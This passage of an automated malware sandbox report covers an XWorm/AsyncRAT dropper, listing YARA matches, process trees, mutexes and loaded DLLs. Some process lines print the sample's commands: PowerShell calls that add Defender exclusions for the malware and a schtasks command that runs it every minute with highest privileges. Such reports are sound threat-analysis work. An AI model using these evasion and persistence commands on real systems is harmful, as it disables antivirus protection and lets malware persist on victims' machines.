                    Source: svchost.exe, 00000013.00000003.3002178502.00000284B3A70000.00000004.00000800.00020000.00000000.sdmp, edb.log.19.dr, qmgr.db.19.drString found in binary or memory: https://g.live.com/odclientsettings/ProdV2.C:
                    Source: powershell.exe, 0000000D.00000002.2688484901.000001C10557B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/Pester/Pester
                    Source: powershell.exe, 0000000B.00000002.2639330504.0000021EE878B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ion=v4.5n
                    Source: powershell.exe, 00000004.00000002.2349698693.0000017045FE5000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2458610974.000001A290075000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000B.00000002.2614120753.0000021EE0183000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000D.00000002.2829582139.000001C115352000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://nuget.org/nuget.exe
                    Source: qmgr.db.19.drString found in binary or memory: https://oneclient.sfx.ms/Win/Prod/21.220.1024.0005/OneDriveSetup.exe/C:

                    Operating System Destruction

                    barindex
                    Protects its processes via BreakOnTermination flag
                    Source: C:\Users\user\Desktop\24572628.exeProcess information set: 01 00 00 00 Jump to behavior

                    System Summary

                    barindex
                    Malicious sample detected (through community Yara rule)
                    Source: 3.0.24572628.exe.340000.0.unpack, type: UNPACKEDPEMatched rule: Finds XWorm (version XClient, v3) samples based on characteristic strings Author: Sekoia.io
                    Source: 3.0.24572628.exe.340000.0.unpack, type: UNPACKEDPEMatched rule: Detects AsyncRAT Author: ditekSHen
                    Source: 0.2.YPzNsfg4nR.exe.208000a6c48.0.raw.unpack, type: UNPACKEDPEMatched rule: Finds XWorm (version XClient, v3) samples based on characteristic strings Author: Sekoia.io
                    Source: 0.2.YPzNsfg4nR.exe.208000a6c48.0.raw.unpack, type: UNPACKEDPEMatched rule: Detects AsyncRAT Author: ditekSHen
                    Source: 0.2.YPzNsfg4nR.exe.208000a6c48.0.unpack, type: UNPACKEDPEMatched rule: Finds XWorm (version XClient, v3) samples based on characteristic strings Author: Sekoia.io
                    Source: 0.2.YPzNsfg4nR.exe.208000a6c48.0.unpack, type: UNPACKEDPEMatched rule: Detects AsyncRAT Author: ditekSHen
                    Source: 00000003.00000000.2221776118.0000000000342000.00000002.00000001.01000000.00000006.sdmp, type: MEMORYMatched rule: Detects AsyncRAT Author: ditekSHen
                    Source: 00000000.00000002.2273726750.00000208000A5000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects AsyncRAT Author: ditekSHen
                    Source: C:\ProgramData\coding, type: DROPPEDMatched rule: Finds XWorm (version XClient, v3) samples based on characteristic strings Author: Sekoia.io
                    Source: C:\ProgramData\coding, type: DROPPEDMatched rule: Detects AsyncRAT Author: ditekSHen
                    Source: C:\Users\user\Desktop\24572628.exe, type: DROPPEDMatched rule: Finds XWorm (version XClient, v3) samples based on characteristic strings Author: Sekoia.io
                    Source: C:\Users\user\Desktop\24572628.exe, type: DROPPEDMatched rule: Detects AsyncRAT Author: ditekSHen
                    Source: C:\Windows\System32\svchost.exeFile created: C:\Windows\ServiceProfiles\LocalService\AppData\Local\FontCache\Fonts\Download-1.tmp
                    Source: C:\Users\user\Desktop\24572628.exeCode function: 3_2_00007FF848A412903_2_00007FF848A41290
                    Source: C:\Users\user\Desktop\24572628.exeCode function: 3_2_00007FF848A46E723_2_00007FF848A46E72
                    Source: C:\Users\user\Desktop\24572628.exeCode function: 3_2_00007FF848A417193_2_00007FF848A41719
                    Source: C:\Users\user\Desktop\24572628.exeCode function: 3_2_00007FF848A460C63_2_00007FF848A460C6
                    Source: C:\Users\user\Desktop\24572628.exeCode function: 3_2_00007FF848A4108D3_2_00007FF848A4108D
                    Source: C:\Users\user\Desktop\24572628.exeCode function: 3_2_00007FF848A420F13_2_00007FF848A420F1
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 4_2_00007FF848B130E74_2_00007FF848B130E7
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 8_2_00007FF848B330E98_2_00007FF848B330E9
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 13_2_00007FF848B42E1113_2_00007FF848B42E11
                    Source: C:\ProgramData\codingCode function: 17_2_00007FF848A7171917_2_00007FF848A71719
                    Source: C:\ProgramData\codingCode function: 17_2_00007FF848A720F117_2_00007FF848A720F1
                    Source: C:\ProgramData\codingCode function: 17_2_00007FF848A7103817_2_00007FF848A71038
                    Source: C:\ProgramData\codingCode function: 21_2_00007FF848A3171921_2_00007FF848A31719
                    Source: C:\ProgramData\codingCode function: 21_2_00007FF848A320F121_2_00007FF848A320F1
                    Source: C:\ProgramData\codingCode function: 21_2_00007FF848A3103821_2_00007FF848A31038
                    Source: YPzNsfg4nR.exeStatic PE information: No import functions for PE file found
                    Source: YPzNsfg4nR.exe, 00000000.00000000.2176160386.0000020868AC6000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFilename1fht7W0d34QhN.exe< vs YPzNsfg4nR.exe
                    Source: YPzNsfg4nR.exe, 00000000.00000002.2273726750.00000208000A5000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamexingping.exe4 vs YPzNsfg4nR.exe
                    Source: YPzNsfg4nR.exe, 00000000.00000002.2274202770.0000020868C65000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenamexiW vs YPzNsfg4nR.exe
                    Source: YPzNsfg4nR.exeBinary or memory string: OriginalFilename1fht7W0d34QhN.exe< vs YPzNsfg4nR.exe
                    Source: 3.0.24572628.exe.340000.0.unpack, type: UNPACKEDPEMatched rule: rat_win_xworm_v3 author = Sekoia.io, description = Finds XWorm (version XClient, v3) samples based on characteristic strings, creation_date = 2023-03-03, classification = TLP:CLEAR, version = 1.0, id = 5fb1cbd3-1e37-43b9-9606-86d896f2150b, hash = de0127ba872c0677c3594c66b2298edea58d097b5fa697302a16b1689147b147
                    Source: 3.0.24572628.exe.340000.0.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
                    Source: 0.2.YPzNsfg4nR.exe.208000a6c48.0.raw.unpack, type: UNPACKEDPEMatched rule: rat_win_xworm_v3 author = Sekoia.io, description = Finds XWorm (version XClient, v3) samples based on characteristic strings, creation_date = 2023-03-03, classification = TLP:CLEAR, version = 1.0, id = 5fb1cbd3-1e37-43b9-9606-86d896f2150b, hash = de0127ba872c0677c3594c66b2298edea58d097b5fa697302a16b1689147b147
                    Source: 0.2.YPzNsfg4nR.exe.208000a6c48.0.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
                    Source: 0.2.YPzNsfg4nR.exe.208000a6c48.0.unpack, type: UNPACKEDPEMatched rule: rat_win_xworm_v3 author = Sekoia.io, description = Finds XWorm (version XClient, v3) samples based on characteristic strings, creation_date = 2023-03-03, classification = TLP:CLEAR, version = 1.0, id = 5fb1cbd3-1e37-43b9-9606-86d896f2150b, hash = de0127ba872c0677c3594c66b2298edea58d097b5fa697302a16b1689147b147
                    Source: 0.2.YPzNsfg4nR.exe.208000a6c48.0.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
                    Source: 00000003.00000000.2221776118.0000000000342000.00000002.00000001.01000000.00000006.sdmp, type: MEMORYMatched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
                    Source: 00000000.00000002.2273726750.00000208000A5000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
                    Source: C:\ProgramData\coding, type: DROPPEDMatched rule: rat_win_xworm_v3 author = Sekoia.io, description = Finds XWorm (version XClient, v3) samples based on characteristic strings, creation_date = 2023-03-03, classification = TLP:CLEAR, version = 1.0, id = 5fb1cbd3-1e37-43b9-9606-86d896f2150b, hash = de0127ba872c0677c3594c66b2298edea58d097b5fa697302a16b1689147b147
                    Source: C:\ProgramData\coding, type: DROPPEDMatched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
                    Source: C:\Users\user\Desktop\24572628.exe, type: DROPPEDMatched rule: rat_win_xworm_v3 author = Sekoia.io, description = Finds XWorm (version XClient, v3) samples based on characteristic strings, creation_date = 2023-03-03, classification = TLP:CLEAR, version = 1.0, id = 5fb1cbd3-1e37-43b9-9606-86d896f2150b, hash = de0127ba872c0677c3594c66b2298edea58d097b5fa697302a16b1689147b147
                    Source: C:\Users\user\Desktop\24572628.exe, type: DROPPEDMatched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
                    Source: YPzNsfg4nR.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                    Source: YPzNsfg4nR.exe, Loader.csCryptographic APIs: 'CreateDecryptor'
                    Source: 24572628.exe.0.dr, OszBM2fJqaqDqfTYb3i92yMDtuZ.csCryptographic APIs: 'TransformFinalBlock'
                    Source: 24572628.exe.0.dr, OszBM2fJqaqDqfTYb3i92yMDtuZ.csCryptographic APIs: 'TransformFinalBlock'
                    Source: 24572628.exe.0.dr, SIIG8lqorRBYoF5JEoCZBv9CuNq.csCryptographic APIs: 'TransformFinalBlock'
                    Source: 0.2.YPzNsfg4nR.exe.208000a6c48.0.raw.unpack, OszBM2fJqaqDqfTYb3i92yMDtuZ.csCryptographic APIs: 'TransformFinalBlock'
                    Source: 0.2.YPzNsfg4nR.exe.208000a6c48.0.raw.unpack, OszBM2fJqaqDqfTYb3i92yMDtuZ.csCryptographic APIs: 'TransformFinalBlock'
                    Source: 0.2.YPzNsfg4nR.exe.208000a6c48.0.raw.unpack, SIIG8lqorRBYoF5JEoCZBv9CuNq.csCryptographic APIs: 'TransformFinalBlock'
                    Source: coding.3.dr, OszBM2fJqaqDqfTYb3i92yMDtuZ.csCryptographic APIs: 'TransformFinalBlock'
                    Source: coding.3.dr, OszBM2fJqaqDqfTYb3i92yMDtuZ.csCryptographic APIs: 'TransformFinalBlock'
                    Source: coding.3.dr, SIIG8lqorRBYoF5JEoCZBv9CuNq.csCryptographic APIs: 'TransformFinalBlock'
                    Source: 0.2.YPzNsfg4nR.exe.208000a6c48.0.raw.unpack, IO1UOhIFtJUrq7FFz6TE95gcPv3vcEtJ2sUCsLDnYmwnk7Bi3nQvt8hBnnHX1W7MSOynjPXn52SG8fIjMKC9I.csSecurity API names: System.Security.Principal.WindowsPrincipal.IsInRole(System.Security.Principal.WindowsBuiltInRole)
                    Source: 0.2.YPzNsfg4nR.exe.208000a6c48.0.raw.unpack, IO1UOhIFtJUrq7FFz6TE95gcPv3vcEtJ2sUCsLDnYmwnk7Bi3nQvt8hBnnHX1W7MSOynjPXn52SG8fIjMKC9I.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                    Source: 24572628.exe.0.dr, IO1UOhIFtJUrq7FFz6TE95gcPv3vcEtJ2sUCsLDnYmwnk7Bi3nQvt8hBnnHX1W7MSOynjPXn52SG8fIjMKC9I.csSecurity API names: System.Security.Principal.WindowsPrincipal.IsInRole(System.Security.Principal.WindowsBuiltInRole)
                    Source: 24572628.exe.0.dr, IO1UOhIFtJUrq7FFz6TE95gcPv3vcEtJ2sUCsLDnYmwnk7Bi3nQvt8hBnnHX1W7MSOynjPXn52SG8fIjMKC9I.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                    Source: coding.3.dr, IO1UOhIFtJUrq7FFz6TE95gcPv3vcEtJ2sUCsLDnYmwnk7Bi3nQvt8hBnnHX1W7MSOynjPXn52SG8fIjMKC9I.csSecurity API names: System.Security.Principal.WindowsPrincipal.IsInRole(System.Security.Principal.WindowsBuiltInRole)
                    Source: coding.3.dr, IO1UOhIFtJUrq7FFz6TE95gcPv3vcEtJ2sUCsLDnYmwnk7Bi3nQvt8hBnnHX1W7MSOynjPXn52SG8fIjMKC9I.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                    Source: classification engineClassification label: mal100.troj.evad.winEXE@24/28@2/3
                    Source: C:\Users\user\Desktop\YPzNsfg4nR.exeFile created: C:\Users\user\Desktop\xxx.logJump to behavior
                    Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7340:120:WilError_03
                    Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7712:120:WilError_03
                    Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4288:120:WilError_03
                    Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7336:120:WilError_03
                    Source: C:\ProgramData\codingMutant created: NULL
                    Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:8016:120:WilError_03
                    Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3628:120:WilError_03
                    Source: C:\Windows\System32\OpenWith.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7752:120:WilError_03
                    Source: C:\Users\user\Desktop\24572628.exeMutant created: \Sessions\1\BaseNamedObjects\HAzSfCvWFIXriVXa
                    Source: C:\Windows\System32\OpenWith.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3536:120:WilError_03
                    Source: C:\Users\user\Desktop\24572628.exeFile created: C:\Users\user\AppData\Local\Temp\Log.tmpJump to behavior
                    Source: YPzNsfg4nR.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                    Source: YPzNsfg4nR.exeStatic file information: TRID: Win64 Executable Console Net Framework (206006/5) 48.58%
                    Source: C:\Users\user\Desktop\YPzNsfg4nR.exeFile read: C:\Users\desktop.iniJump to behavior
                    Source: C:\Users\user\Desktop\YPzNsfg4nR.exeKey opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
                    Source: YPzNsfg4nR.exeVirustotal: Detection: 16%
                    Source: unknownProcess created: C:\Users\user\Desktop\YPzNsfg4nR.exe "C:\Users\user\Desktop\YPzNsfg4nR.exe"
                    Source: C:\Users\user\Desktop\YPzNsfg4nR.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                    Source: C:\Users\user\Desktop\YPzNsfg4nR.exeProcess created: C:\Users\user\Desktop\24572628.exe "C:\Users\user\Desktop\24572628.exe"
                    Source: C:\Users\user\Desktop\24572628.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\24572628.exe'
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                    Source: C:\Users\user\Desktop\24572628.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess '24572628.exe'
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                    Source: C:\Users\user\Desktop\24572628.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\ProgramData\coding'
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                    Source: C:\Users\user\Desktop\24572628.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'coding'
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                    Source: C:\Users\user\Desktop\24572628.exeProcess created: C:\Windows\System32\schtasks.exe "C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "coding" /tr "C:\ProgramData\coding"
                    Source: C:\Windows\System32\schtasks.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                    Source: unknownProcess created: C:\ProgramData\coding C:\ProgramData\coding
                    Source: unknownProcess created: C:\Windows\System32\OpenWith.exe C:\Windows\system32\OpenWith.exe -Embedding
                    Source: unknownProcess created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS
                    Source: unknownProcess created: C:\Windows\System32\OpenWith.exe C:\Windows\system32\OpenWith.exe -Embedding
                    Source: unknownProcess created: C:\ProgramData\coding C:\ProgramData\coding
                    Source: C:\Users\user\Desktop\YPzNsfg4nR.exeProcess created: C:\Users\user\Desktop\24572628.exe "C:\Users\user\Desktop\24572628.exe" Jump to behavior
                    Source: C:\Users\user\Desktop\24572628.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\24572628.exe'Jump to behavior
                    Source: C:\Users\user\Desktop\24572628.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess '24572628.exe'Jump to behavior
                    Source: C:\Users\user\Desktop\24572628.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\ProgramData\coding'Jump to behavior
                    Source: C:\Users\user\Desktop\24572628.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'coding'Jump to behavior
                    Source: C:\Users\user\Desktop\24572628.exeProcess created: C:\Windows\System32\schtasks.exe "C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "coding" /tr "C:\ProgramData\coding"Jump to behavior
                    Source: C:\Users\user\Desktop\YPzNsfg4nR.exeSection loaded: mscoree.dllJump to behavior
                    Source: C:\Users\user\Desktop\YPzNsfg4nR.exeSection loaded: apphelp.dllJump to behavior
                    Source: C:\Users\user\Desktop\YPzNsfg4nR.exeSection loaded: kernel.appcore.dllJump to behavior
                    Source: C:\Users\user\Desktop\YPzNsfg4nR.exeSection loaded: version.dllJump to behavior
                    Source: C:\Users\user\Desktop\YPzNsfg4nR.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                    Source: C:\Users\user\Desktop\YPzNsfg4nR.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                    Source: C:\Users\user\Desktop\YPzNsfg4nR.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                    Source: C:\Users\user\Desktop\YPzNsfg4nR.exeSection loaded: windows.storage.dllJump to behavior
                    Source: C:\Users\user\Desktop\YPzNsfg4nR.exeSection loaded: wldp.dllJump to behavior
                    Source: C:\Users\user\Desktop\YPzNsfg4nR.exeSection loaded: profapi.dllJump to behavior
                    Source: C:\Users\user\Desktop\YPzNsfg4nR.exeSection loaded: cryptsp.dllJump to behavior
                    Source: C:\Users\user\Desktop\YPzNsfg4nR.exeSection loaded: rsaenh.dllJump to behavior
                    Source: C:\Users\user\Desktop\YPzNsfg4nR.exeSection loaded: cryptbase.dllJump to behavior
                    Source: C:\Users\user\Desktop\YPzNsfg4nR.exeSection loaded: uxtheme.dllJump to behavior
                    Source: C:\Users\user\Desktop\YPzNsfg4nR.exeSection loaded: propsys.dllJump to behavior
                    Source: C:\Users\user\Desktop\YPzNsfg4nR.exeSection loaded: edputil.dllJump to behavior
                    Source: C:\Users\user\Desktop\YPzNsfg4nR.exeSection loaded: urlmon.dllJump to behavior
                    Source: C:\Users\user\Desktop\YPzNsfg4nR.exeSection loaded: iertutil.dllJump to behavior
                    Source: C:\Users\user\Desktop\YPzNsfg4nR.exeSection loaded: srvcli.dllJump to behavior
                    Source: C:\Users\user\Desktop\YPzNsfg4nR.exeSection loaded: netutils.dllJump to behavior
                    Source: C:\Users\user\Desktop\YPzNsfg4nR.exeSection loaded: windows.staterepositoryps.dllJump to behavior
                    Source: C:\Users\user\Desktop\YPzNsfg4nR.exeSection loaded: sspicli.dllJump to behavior
                    Source: C:\Users\user\Desktop\YPzNsfg4nR.exeSection loaded: wintypes.dllJump to behavior
                    Source: C:\Users\user\Desktop\YPzNsfg4nR.exeSection loaded: appresolver.dllJump to behavior
                    Source: C:\Users\user\Desktop\YPzNsfg4nR.exeSection loaded: bcp47langs.dllJump to behavior
                    Source: C:\Users\user\Desktop\YPzNsfg4nR.exeSection loaded: slc.dllJump to behavior
                    Source: C:\Users\user\Desktop\YPzNsfg4nR.exeSection loaded: userenv.dllJump to behavior
                    Source: C:\Users\user\Desktop\YPzNsfg4nR.exeSection loaded: sppc.dllJump to behavior
                    Source: C:\Users\user\Desktop\YPzNsfg4nR.exeSection loaded: onecorecommonproxystub.dllJump to behavior
                    Source: C:\Users\user\Desktop\YPzNsfg4nR.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
                    Source: C:\Users\user\Desktop\24572628.exeSection loaded: mscoree.dllJump to behavior
                    Source: C:\Users\user\Desktop\24572628.exeSection loaded: apphelp.dllJump to behavior
                    Source: C:\Users\user\Desktop\24572628.exeSection loaded: kernel.appcore.dllJump to behavior
                    Source: C:\Users\user\Desktop\24572628.exeSection loaded: version.dllJump to behavior
                    Source: C:\Users\user\Desktop\24572628.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                    Source: C:\Users\user\Desktop\24572628.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                    Source: C:\Users\user\Desktop\24572628.exeSection loaded: uxtheme.dllJump to behavior
                    Source: C:\Users\user\Desktop\24572628.exeSection loaded: sspicli.dllJump to behavior
                    Source: C:\Users\user\Desktop\24572628.exeSection loaded: cryptsp.dllJump to behavior
                    Source: C:\Users\user\Desktop\24572628.exeSection loaded: rsaenh.dllJump to behavior
                    Source: C:\Users\user\Desktop\24572628.exeSection loaded: cryptbase.dllJump to behavior
                    Source: C:\Users\user\Desktop\24572628.exeSection loaded: wbemcomn.dllJump to behavior
                    Source: C:\Users\user\Desktop\24572628.exeSection loaded: amsi.dllJump to behavior
                    Source: C:\Users\user\Desktop\24572628.exeSection loaded: userenv.dllJump to behavior
                    Source: C:\Users\user\Desktop\24572628.exeSection loaded: profapi.dllJump to behavior
                    Source: C:\Users\user\Desktop\24572628.exeSection loaded: windows.storage.dllJump to behavior
                    Source: C:\Users\user\Desktop\24572628.exeSection loaded: wldp.dllJump to behavior
                    Source: C:\Users\user\Desktop\24572628.exeSection loaded: rasapi32.dllJump to behavior
                    Source: C:\Users\user\Desktop\24572628.exeSection loaded: rasman.dllJump to behavior
                    Source: C:\Users\user\Desktop\24572628.exeSection loaded: rtutils.dllJump to behavior
                    Source: C:\Users\user\Desktop\24572628.exeSection loaded: mswsock.dllJump to behavior
                    Source: C:\Users\user\Desktop\24572628.exeSection loaded: winhttp.dllJump to behavior
                    Source: C:\Users\user\Desktop\24572628.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                    Source: C:\Users\user\Desktop\24572628.exeSection loaded: iphlpapi.dllJump to behavior
                    Source: C:\Users\user\Desktop\24572628.exeSection loaded: dhcpcsvc6.dllJump to behavior
                    Source: C:\Users\user\Desktop\24572628.exeSection loaded: dhcpcsvc.dllJump to behavior
                    Source: C:\Users\user\Desktop\24572628.exeSection loaded: dnsapi.dllJump to behavior
                    Source: C:\Users\user\Desktop\24572628.exeSection loaded: winnsi.dllJump to behavior
                    Source: C:\Users\user\Desktop\24572628.exeSection loaded: rasadhlp.dllJump to behavior
                    Source: C:\Users\user\Desktop\24572628.exeSection loaded: fwpuclnt.dllJump to behavior
                    Source: C:\Users\user\Desktop\24572628.exeSection loaded: propsys.dllJump to behavior
                    Source: C:\Users\user\Desktop\24572628.exeSection loaded: edputil.dllJump to behavior
                    Source: C:\Users\user\Desktop\24572628.exeSection loaded: urlmon.dllJump to behavior
                    Source: C:\Users\user\Desktop\24572628.exeSection loaded: iertutil.dllJump to behavior
                    Source: C:\Users\user\Desktop\24572628.exeSection loaded: srvcli.dllJump to behavior
                    Source: C:\Users\user\Desktop\24572628.exeSection loaded: netutils.dllJump to behavior
                    Source: C:\Users\user\Desktop\24572628.exeSection loaded: windows.staterepositoryps.dllJump to behavior
                    Source: C:\Users\user\Desktop\24572628.exeSection loaded: wintypes.dllJump to behavior
                    Source: C:\Users\user\Desktop\24572628.exeSection loaded: appresolver.dllJump to behavior
                    Source: C:\Users\user\Desktop\24572628.exeSection loaded: bcp47langs.dllJump to behavior
                    Source: C:\Users\user\Desktop\24572628.exeSection loaded: slc.dllJump to behavior
                    Source: C:\Users\user\Desktop\24572628.exeSection loaded: sppc.dllJump to behavior
                    Source: C:\Users\user\Desktop\24572628.exeSection loaded: onecorecommonproxystub.dllJump to behavior
                    Source: C:\Users\user\Desktop\24572628.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
                    Source: C:\Users\user\Desktop\24572628.exeSection loaded: sxs.dllJump to behavior
                    Source: C:\Users\user\Desktop\24572628.exeSection loaded: mpr.dllJump to behavior
                    Source: C:\Users\user\Desktop\24572628.exeSection loaded: scrrun.dllJump to behavior
                    Source: C:\Users\user\Desktop\24572628.exeSection loaded: linkinfo.dllJump to behavior
                    Source: C:\Users\user\Desktop\24572628.exeSection loaded: ntshrui.dllJump to behavior
                    Source: C:\Users\user\Desktop\24572628.exeSection loaded: cscapi.dllJump to behavior
                    Source: C:\Users\user\Desktop\24572628.exeSection loaded: avicap32.dllJump to behavior
                    Source: C:\Users\user\Desktop\24572628.exeSection loaded: msvfw32.dllJump to behavior
                    Source: C:\Users\user\Desktop\24572628.exeSection loaded: winmm.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dllJump to behavior
